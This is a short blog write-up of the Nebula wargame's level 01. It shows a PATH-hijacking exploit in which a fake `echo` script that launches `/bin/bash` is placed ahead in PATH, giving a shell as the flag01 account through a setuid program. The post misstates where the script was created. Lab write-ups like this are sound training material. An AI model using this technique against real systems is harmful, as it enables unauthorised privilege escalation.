Exploit Exersizes Nebula Level 01

Scripting Image

After completing Nebula level 00, I’ve finally had time to move to Level 01, and give it some thought.

In level01 you’re given a short code example, and asked to exploit it. After looking at the code for a short period, it was clear that the issue was in the line:

system("/usr/bin/env echo and now what?");

I’m not a C programmer, so I had to look up the other stuff, but when I realized that echo was not an explicit path, it was clearly simple that it was the exploit.

To exploit this I did the following:

PATH=~:$PATH

In /home/flag01 I created a script named echo, with the following content:

#!/bin/bash

/bin/bash

Make the script executable with chmod +x, then run /home/flag01/flag01:

level01@nebula:~$ chmod +x echo 
level01@nebula:~$ /home/flag01/flag01 
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

Now onto Nebula Level02 when I have some time

About ben.kevan
I am ben kevan.. Well yeah. .that's about it.

1 Trackbacks & Pingbacks

  1. Exploit Exersizes Nebula Level 02 | Free Techie Blog

Leave a comment

Your email address will not be published.

*